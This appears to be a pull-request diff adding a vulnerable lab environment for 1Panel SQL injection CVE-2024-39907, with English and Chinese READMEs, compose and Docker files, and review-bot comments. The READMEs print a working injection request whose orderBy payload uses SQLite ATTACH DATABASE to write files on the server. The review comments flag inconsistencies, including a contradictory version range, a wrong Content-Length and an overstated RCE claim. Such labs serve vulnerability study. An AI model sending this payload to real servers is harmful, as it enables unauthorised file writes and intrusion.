Binary file added 1panel/CVE-2024-39907/1.png
61 changes: 61 additions & 0 deletions 1panel/CVE-2024-39907/README.md
@@ -0,0 +1,61 @@
# 1Panel Control Panel PostAuth SQL Injection (CVE-2024-39907)

[中文版本(Chinese version)](README.zh-cn.md)

1Panel is a web-based Linux server management control panel that provides a graphical interface for server administration.

CVE-2024-39907 is a collection of multiple SQL injection vulnerabilities present in the 1Panel control panel. These vulnerabilities exist across several interfaces of 1Panel, where insufficient filtering could allow attackers to achieve arbitrary file writes and ultimately remote code execution (RCE). This vulnerability affects 1Panel versions v1.10.9-lts and earlier, and has been patched in v1.10.12-lts.

References:

- <https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-39907.yaml>
- <https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6>
- <https://hub.docker.com/r/moelin/1panel>

## Environment Setup

Execute the following command to start a vulnerable instance of 1Panel v1.10.10-lts:

```
docker compose up -d
```

After the server starts, access `http://your-ip:10086/entrance` using the following default credentials:

- Port: `10086`
- Username: `1panel`
- Password: `1panel_password`
- Entrance path: `entrance`

## Vulnerability Reproduction

After logging into the 1Panel control panel with the default credentials, the vulnerability exists in the `/api/v1/hosts/command/search` endpoint where the `orderBy` parameter lacks proper input validation, allowing SQL injection attacks.

Send the following malicious POST request to exploit the vulnerability:

```
POST /api/v1/hosts/command/search HTTP/1.1
Host: your-ip:10086
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Cookie: psession=your-session-cookie
Connection: close
Content-Type: application/json
Content-Length: 83

{
"page":1,
"pageSize":10,
"groupID":0,
"orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
"order":"ascending",
"name":"a"
}
```

The malicious payload in the `orderBy` parameter exploits SQLite's ATTACH DATABASE functionality to create arbitrary files on the server filesystem, demonstrating successful SQL injection. When processed, the 1Panel backend executes the injected SQL commands without validation, confirming the vulnerability exists and can be exploited.

![1](1.png)

The successful execution of these database manipulation commands confirms that the SQL injection vulnerability can be exploited to achieve potential remote code execution.
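Review bot: the affected-version statement contradicts the environment this README sets up: the intro says the bug affects "v1.10.9-lts and earlier" and is patched in v1.10.12-lts, yet the setup section starts "a vulnerable instance of 1Panel v1.10.10-lts" and the reproduction is run against it. Either the affected range should be corrected (check it against GHSA-5grx-v727-qmq6 before changing the sentence) or the environment should pin a version inside the stated range. Three smaller things in the request block: `Content-Length: 83` does not match the JSON body that follows (the body is well over 83 bytes), so anyone replaying the request verbatim gets a truncated body; drop the header or recompute it. The payload repeats `create TABLE test.exp (data text);` twice, and the second CREATE fails in SQLite because the table already exists, which can stop the remaining statements from running; one CREATE is enough to force the attached database file to be written. Finally, the closing sentence says the demo "confirms ... potential remote code execution", but what the request shows is an attacker-controlled file created at /tmp/randstr.txt; call it an arbitrary file write here and add a verification step such as `docker compose exec 1panel ls -l /tmp/randstr.txt`, since the HTTP response alone does not prove the file landed.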
59 changes: 59 additions & 0 deletions 1panel/CVE-2024-39907/README.zh-cn.md
@@ -0,0 +1,59 @@
# 1Panel控制面板SQL注入漏洞 (CVE-2024-39907)

1Panel是一款基于Web的Linux服务器管理控制面板,提供服务器管理的图形化界面。

CVE-2024-39907是1Panel控制面板中存在的多个SQL注入漏洞集合,这些漏洞存在于1Panel的多个接口中,部分注入点由于过滤不善,可能导致攻击者实现任意文件写入,最终达成远程命令执行(RCE)。该漏洞影响1Panel v1.10.9-lts及更早版本,已在v1.10.12-lts版本中得到修复。

References:

- <https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-39907.yaml>
- <https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6>
- <https://hub.docker.com/r/moelin/1panel>

## 环境搭建

执行如下命令启动一个有漏洞的1Panel v1.10.10-lts:

```
docker compose up -d
```

环境启动后,访问`http://your-ip:10086/entrance`,使用以下默认凭据登录:

- 端口:`10086`
- 用户名:`1panel`
- 密码:`1panel_password`
- 入口路径:`entrance`

## 漏洞复现

登录1Panel控制面板后,漏洞存在于`/api/v1/hosts/command/search`接口中,`orderBy`参数缺乏适当的输入验证,导致SQL注入攻击。

发送以下恶意POST请求来利用该漏洞:

```
POST /api/v1/hosts/command/search HTTP/1.1
Host: your-ip:10086
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Cookie: psession=your-session-cookie
Connection: close
Content-Type: application/json
Content-Length: 83

{
"page":1,
"pageSize":10,
"groupID":0,
"orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
"order":"ascending",
"name":"a"
}
```

`orderBy`参数中的恶意负载利用SQLite的ATTACH DATABASE功能在服务器文件系统上创建任意文件,演示了成功的SQL注入攻击。处理请求时,1Panel后端会执行注入的SQL命令而不进行验证,确认漏洞存在且可被利用。

![1](1.png)

这些数据库操作命令的成功执行证明SQL注入漏洞可以被利用来实现潜在的远程代码执行。
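Review bot: this file mirrors README.md line for line, so the same corrections apply here: the affected-range sentence ("v1.10.9-lts及更早版本") versus the v1.10.10-lts environment, the `Content-Length: 83` header that does not match the body, the duplicated `create TABLE test.exp (data text);` statement, and the closing claim of remote code execution where only a file write is demonstrated. One inconsistency specific to this file: the heading drops the "PostAuth" qualifier that the English heading and the environments.toml entry carry; the authentication requirement is the first thing a reader should take from the title, so keep it in the Chinese heading too.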
7 changes: 7 additions & 0 deletions 1panel/CVE-2024-39907/docker-compose.yml
@@ -0,0 +1,7 @@
services:
1panel:
image: vulhub/1panel:1.10.10
ports:
- "10086:10086"
environment:
- TZ=Asia/Shanghai # 时区设置
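Review bot: the comment on the TZ line (`# 时区设置`) is in Chinese while the rest of this compose file and the English README are in English; `# timezone` reads consistently for both audiences. Nothing else needed here: the `vulhub/1panel:1.10.10` tag matches the new `base/1panel/1.10.10/Dockerfile`, and 10086 is the port the README documents.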
3 changes: 3 additions & 0 deletions base/1panel/1.10.10/Dockerfile
@@ -0,0 +1,3 @@
FROM moelin/1panel:v1.10.10-lts

LABEL maintainer="wjch611 <[email protected]>"
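Review bot: `FROM moelin/1panel:v1.10.10-lts` pulls a third-party image (the `moelin` namespace, also listed as a reference in the README) rather than one published by the 1Panel project, and pins it only by a tag that can be re-pushed. For a base image the environment builds on, pin by digest (`FROM moelin/1panel@sha256:<digest>`, with the digest recorded from the image actually pulled) or, if a tag is preferred, add a comment stating why this image was chosen and how it was checked to be a stock v1.10.10-lts build that still ships the default `1panel` / `1panel_password` credentials the README relies on.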
22 changes: 14 additions & 8 deletions environments.toml
@@ -7,6 +7,12 @@ tags = [
"Other",
]

[[environment]]
name = "1Panel Control Panel PostAuth SQL Injection"
cve = ["CVE-2024-39907"]
app = "1panel"
path = "1panel/CVE-2024-39907"
tags = ["SQL Injection"]

[[environment]]
name = "Apache ActiveMQ Deserialization"
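Review bot: `tags = ["SQL Injection"]` covers only the injection primitive, while the README's own point is that the injection yields an arbitrary file write and, per its title, RCE. If the repository's tag vocabulary has a file-write tag, add it so the entry is discoverable for what it actually demonstrates; do not add "RCE" unless the README is updated to show code execution rather than assert it. The `name` matches the README heading, which is good.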
@@ -50,13 +56,6 @@ app = "Adminer"
path = "adminer/CVE-2021-43008"
tags = ["Path Traversal"]

[[environment]]
name = "aiohttp Directory Traversal Vulnerability"
cve = ["CVE-2024-23334"]
app = "Python"
path = "python/CVE-2024-23334"
tags = ["Path Traversal"]

[[environment]]
name = "Apache Airflow Command Injection"
cve = ["CVE-2020-11978"]
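Review bot: this hunk and the one below it move the aiohttp (CVE-2024-23334) entry from under Adminer to under PostgreSQL, a reordering unrelated to the 1Panel addition. Split it into its own commit with a message naming the sort key being applied (the entry is evidently being re-sorted by `app = "Python"` rather than by `name`), so that a later `git blame` on the 1Panel entry does not drag in the move and reverting one change does not undo the other.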
@@ -1443,6 +1442,13 @@ app = "PostgreSQL"
path = "postgres/CVE-2019-9193"
tags = ["RCE", "Database"]

[[environment]]
name = "aiohttp Directory Traversal Vulnerability"
cve = ["CVE-2024-23334"]
app = "Python"
path = "python/CVE-2024-23334"
tags = ["Path Traversal"]

[[environment]]
name = "Python PIL/Pillow Remote Command Execution by GhostScript GhostButt"
cve = ["CVE-2017-8291"]
@@ -2106,4 +2112,4 @@ name = "Zabbix Server Active Proxy Trapper Command Injection Bypass"
cve = ["CVE-2020-11800"]
app = "Zabbix"
path = "zabbix/CVE-2020-11800"
tags = ["RCE"]
tags = ["RCE"]
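Review bot: the final hunk removes and re-adds an identical `tags = ["RCE"]` line, which is the signature of a change to the trailing newline at end of file. Check whether environments.toml now ends with a newline (it should, so the next appended `[[environment]]` block does not fuse onto this line and so line-oriented tools behave); if the editor stripped it, restore it, and either way keep a whitespace-only change out of this PR unless it is intentional and mentioned in the commit message.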